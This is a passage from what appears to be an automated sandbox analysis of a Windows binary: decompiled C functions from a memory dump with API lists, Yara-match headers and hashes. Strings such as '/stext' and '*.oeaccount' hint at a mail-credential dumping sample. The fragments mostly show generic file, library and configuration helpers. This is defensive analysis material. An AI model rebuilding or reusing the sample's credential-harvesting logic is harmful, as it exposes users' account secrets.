                                                                                              					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
                                                                                              				}
                                                                                              				return _t23;
                                                                                              			}









                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040EA9A
                                                                                                • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                                                • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                                                              • memset.MSVCRT ref: 0040EAD5
                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3143880245-0
                                                                                              • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                              • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                                                              • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                              • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t14;
                                                                                              				intOrPtr _t15;
                                                                                              				void* _t16;
                                                                                              				void* _t17;
                                                                                              				struct HICON__* _t19;
                                                                                              				intOrPtr* _t23;
                                                                                              				void* _t25;
                                                                                              
                                                                                              				_t23 = __ebx;
                                                                                              				_t14 = __eax;
                                                                                              				 *((intOrPtr*)(__ebx + 0x124)) = 0;
                                                                                              				 *__ebx = 0x41356c;
                                                                                              				 *((intOrPtr*)(__ebx + 0x258)) = 0;
                                                                                              				_push(0x14);
                                                                                              				 *((intOrPtr*)(__ebx + 0x374)) = 0;
                                                                                              				L004115D0();
                                                                                              				if(__eax == 0) {
                                                                                              					_t14 = 0;
                                                                                              					__eflags = 0;
                                                                                              				} else {
                                                                                              					 *0x417114 = __eax;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
                                                                                              				L004115D0(); // executed
                                                                                              				_t32 = _t14;
                                                                                              				_t25 = 0xf38;
                                                                                              				if(_t14 == 0) {
                                                                                              					_t15 = 0;
                                                                                              					__eflags = 0;
                                                                                              				} else {
                                                                                              					_t15 = E00404016(_t14, _t32);
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
                                                                                              				 *((intOrPtr*)(_t23 + 0x378)) = 0;
                                                                                              				 *((intOrPtr*)(_t23 + 0x260)) = 0;
                                                                                              				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
                                                                                              				 *((intOrPtr*)(_t23 + 0x154)) = 0;
                                                                                              				_t16 =  *(_t23 + 0x258);
                                                                                              				if(_t16 != 0) {
                                                                                              					DeleteObject(_t16);
                                                                                              					 *(_t23 + 0x258) = 0;
                                                                                              				}
                                                                                              				_t17 = E00406252(); // executed
                                                                                              				 *(_t23 + 0x258) = _t17;
                                                                                              				E00401000(_t25, _t23 + 0x158, 0x413480);
                                                                                              				_t19 = LoadIconA( *0x416b94, 0x65); // executed
                                                                                              				E004017A4(_t23, _t19);
                                                                                              				return _t23;
                                                                                              			}













                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$DeleteIconLoadObject
                                                                                              • String ID:
                                                                                              • API String ID: 1986663749-0
                                                                                              • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                              • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                                                              • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                              • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E00411932() {
                                                                                              				intOrPtr _t1;
                                                                                              				intOrPtr _t2;
                                                                                              				intOrPtr _t3;
                                                                                              				intOrPtr _t4;
                                                                                              
                                                                                              				_t1 =  *0x417528;
                                                                                              				if(_t1 != 0) {
                                                                                              					_push(_t1);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t2 =  *0x417530;
                                                                                              				if(_t2 != 0) {
                                                                                              					_push(_t2); // executed
                                                                                              					L004115D6(); // executed
                                                                                              				}
                                                                                              				_t3 =  *0x41752c;
                                                                                              				if(_t3 != 0) {
                                                                                              					_push(_t3);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t4 =  *0x417534;
                                                                                              				if(_t4 != 0) {
                                                                                              					_push(_t4); // executed
                                                                                              					L004115D6(); // executed
                                                                                              					return _t4;
                                                                                              				}
                                                                                              				return _t4;
                                                                                              			}








                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                              • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                                                              • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                              • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 78%
                                                                                              			E0040787D() {
                                                                                              				void* _t13;
                                                                                              				signed int _t16;
                                                                                              				signed int _t18;
                                                                                              				signed int _t27;
                                                                                              				signed int _t29;
                                                                                              				intOrPtr _t33;
                                                                                              
                                                                                              				_t33 =  *0x417540;
                                                                                              				if(_t33 == 0) {
                                                                                              					_push(0x8000);
                                                                                              					 *0x417540 = 0x8000;
                                                                                              					 *0x417544 = 0x100;
                                                                                              					 *0x417548 = 0x1000; // executed
                                                                                              					L004115D0(); // executed
                                                                                              					 *0x417528 = 0x8000;
                                                                                              					_t27 = 4;
                                                                                              					_t16 =  *0x417544 * _t27;
                                                                                              					_push( ~(0 | _t33 > 0x00000000) | _t16);
                                                                                              					L004115D0();
                                                                                              					 *0x417530 = _t16;
                                                                                              					_t29 = 4;
                                                                                              					_t18 =  *0x417544 * _t29;
                                                                                              					_push( ~(0 | _t33 > 0x00000000) | _t18);
                                                                                              					L004115D0();
                                                                                              					_push( *0x417548);
                                                                                              					 *0x417534 = _t18; // executed
                                                                                              					L004115D0(); // executed
                                                                                              					 *0x41752c = _t18;
                                                                                              					return _t18;
                                                                                              				}
                                                                                              				return _t13;
                                                                                              			}










                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1033339047-0
                                                                                              • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                              • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                                                              • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                              • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
                                                                                              				void* _t8;
                                                                                              				void* _t13;
                                                                                              				signed int _t16;
                                                                                              				void** _t21;
                                                                                              				signed int _t22;
                                                                                              
                                                                                              				_t21 = __edi;
                                                                                              				_t22 =  *__eax;
                                                                                              				if(__edx < _t22) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t13 =  *__edi;
                                                                                              					do {
                                                                                              						 *__eax =  *__eax + _a8;
                                                                                              						_t16 =  *__eax;
                                                                                              					} while (__edx >= _t16);
                                                                                              					_t8 = malloc(_t16 * _a4); // executed
                                                                                              					 *__edi = _t8;
                                                                                              					if(_t22 > 0) {
                                                                                              						if(_t8 != 0) {
                                                                                              							memcpy(_t8, _t13, _t22 * _a4);
                                                                                              						}
                                                                                              						free(_t13);
                                                                                              					}
                                                                                              					return 0 |  *_t21 != 0x00000000;
                                                                                              				}
                                                                                              			}









                                                                                              APIs
                                                                                              • malloc.MSVCRT ref: 00406116
                                                                                              • memcpy.MSVCRT ref: 0040612E
                                                                                              • free.MSVCRT(00000000,00000000,75144DE0,00406B49,00000001,?,00000000,75144DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: freemallocmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3056473165-0
                                                                                              • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                              • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                                                              • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                              • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E0040B8D7(void* __edi, void* __eflags) {
                                                                                              				void* __esi;
                                                                                              				signed int _t24;
                                                                                              				intOrPtr _t31;
                                                                                              				intOrPtr _t38;
                                                                                              				void* _t42;
                                                                                              				void* _t45;
                                                                                              				void* _t49;
                                                                                              				void* _t51;
                                                                                              				intOrPtr _t52;
                                                                                              
                                                                                              				_t54 = __eflags;
                                                                                              				_t49 = __edi;
                                                                                              				_t38 = 0;
                                                                                              				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
                                                                                              				 *((intOrPtr*)(__edi + 0x108)) = 0;
                                                                                              				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
                                                                                              				_t24 =  *((intOrPtr*)(__edi + 0x37c));
                                                                                              				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
                                                                                              					_t51 = 0x412466;
                                                                                              				} else {
                                                                                              					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
                                                                                              						_t45 = 0;
                                                                                              						__eflags = 0;
                                                                                              					} else {
                                                                                              						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
                                                                                              					}
                                                                                              					_t51 = _t45;
                                                                                              				}
                                                                                              				_push(_t51);
                                                                                              				_push("/stext");
                                                                                              				L004115B2();
                                                                                              				if(_t24 != 0) {
                                                                                              					_t52 = E0040B841(_t24, _t51);
                                                                                              					__eflags = _t52 - _t38;
                                                                                              					if(_t52 <= _t38) {
                                                                                              						goto L15;
                                                                                              					}
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					_t52 = 1;
                                                                                              					L9:
                                                                                              					E0040AF17(_t49, _t38); // executed
                                                                                              					E0040A5AC(_t49);
                                                                                              					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
                                                                                              					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
                                                                                              						_t42 = 0x412466;
                                                                                              					} else {
                                                                                              						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
                                                                                              						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
                                                                                              							_t42 = 0;
                                                                                              						} else {
                                                                                              							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
                                                                                              						}
                                                                                              					}
                                                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
                                                                                              					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
                                                                                              					_t38 = 1;
                                                                                              					E0040B0C2(_t49);
                                                                                              					L15:
                                                                                              					return _t38;
                                                                                              				}
                                                                                              			}













                                                                                              APIs
                                                                                                • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                                                              • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$_stricmpmemset
                                                                                              • String ID: /stext
                                                                                              • API String ID: 3575250601-3817206916
                                                                                              • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                              • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                                                              • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                              • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00406252() {
                                                                                              				struct tagLOGFONTA _v64;
                                                                                              				struct HFONT__* _t6;
                                                                                              
                                                                                              				E00406191( &_v64, "Arial", 0xe, 0);
                                                                                              				_t6 = CreateFontIndirectA( &_v64); // executed
                                                                                              				return _t6;
                                                                                              			}






                                                                                              APIs
                                                                                                • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                                • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFontIndirectmemsetstrcpy
                                                                                              • String ID: Arial
                                                                                              • API String ID: 3275230829-493054409
                                                                                              • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                                              • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                                                              • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                                              • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004047A0(CHAR* __esi, void* __eflags) {
                                                                                              				struct HINSTANCE__* _t8;
                                                                                              				char _t12;
                                                                                              				char* _t15;
                                                                                              				CHAR* _t17;
                                                                                              
                                                                                              				_t17 = __esi;
                                                                                              				E004047F1(__esi);
                                                                                              				_t8 = LoadLibraryA(__esi); // executed
                                                                                              				__esi[0x200] = _t8;
                                                                                              				if(_t8 != 0) {
                                                                                              					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
                                                                                              					__esi[0x208] = _t12;
                                                                                              					if(_t12 != 0) {
                                                                                              						__esi[0x204] = 1;
                                                                                              					}
                                                                                              				}
                                                                                              				_t15 =  &(_t17[0x204]);
                                                                                              				if( *_t15 == 0) {
                                                                                              					E004047F1(_t17);
                                                                                              				}
                                                                                              				return  *_t15;
                                                                                              			}








                                                                                              APIs
                                                                                                • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                              • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID:
                                                                                              • API String ID: 145871493-0
                                                                                              • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                              • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                                                              • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                              • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                                                                • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                                                • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                                                • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                              • String ID:
                                                                                              • API String ID: 4165544737-0
                                                                                              • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                              • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                                                              • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                              • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004047F1(void* __eax) {
                                                                                              				struct HINSTANCE__* _t5;
                                                                                              				signed int* _t7;
                                                                                              
                                                                                              				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
                                                                                              				_t7 = __eax + 0x200;
                                                                                              				_t5 =  *_t7;
                                                                                              				if(_t5 != 0) {
                                                                                              					_t5 = FreeLibrary(_t5); // executed
                                                                                              					 *_t7 =  *_t7 & 0x00000000;
                                                                                              				}
                                                                                              				return _t5;
                                                                                              			}






                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                              • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                                                              • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                              • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405EE4(CHAR* _a4) {
                                                                                              				void* _t3;
                                                                                              
                                                                                              				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                                                              				return _t3;
                                                                                              			}





                                                                                              APIs
                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                              • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                                                              • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                              • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E894(void* __esi) {
                                                                                              				struct HINSTANCE__* _t6;
                                                                                              				int _t7;
                                                                                              
                                                                                              				_t6 =  *(__esi + 8);
                                                                                              				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
                                                                                              				if(_t6 != 0) {
                                                                                              					_t7 = FreeLibrary(_t6); // executed
                                                                                              					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
                                                                                              					return _t7;
                                                                                              				}
                                                                                              				return _t6;
                                                                                              			}






                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                              • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                                                              • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                              • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {
                                                                                              
                                                                                              				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
                                                                                              				return 1;
                                                                                              			}



                                                                                              0x0040eda0
                                                                                              0x0040eda9

                                                                                              APIs
                                                                                              • EnumResourceNamesA.KERNEL32 ref: 0040EDA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnumNamesResource
                                                                                              • String ID:
                                                                                              • API String ID: 3334572018-0
                                                                                              • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                              • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                                                              • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                              • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00406F5B(signed int* __esi) {
                                                                                              				int _t2;
                                                                                              				void* _t3;
                                                                                              
                                                                                              				_t3 =  *__esi;
                                                                                              				if(_t3 != 0xffffffff) {
                                                                                              					_t2 = FindClose(_t3); // executed
                                                                                              					 *__esi =  *__esi | 0xffffffff;
                                                                                              					return _t2;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}






                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                              • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                                                              • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                              • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040614B(CHAR* _a4) {
                                                                                              				long _t4;
                                                                                              
                                                                                              				_t4 = GetFileAttributesA(_a4); // executed
                                                                                              				return 0 | _t4 != 0xffffffff;
                                                                                              			}




                                                                                              0x0040614f
                                                                                              0x0040615f

                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                              • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                                                              • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                              • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040EB3F(void* _a4, char* _a8, void** _a12) {
                                                                                              				long _t4;
                                                                                              
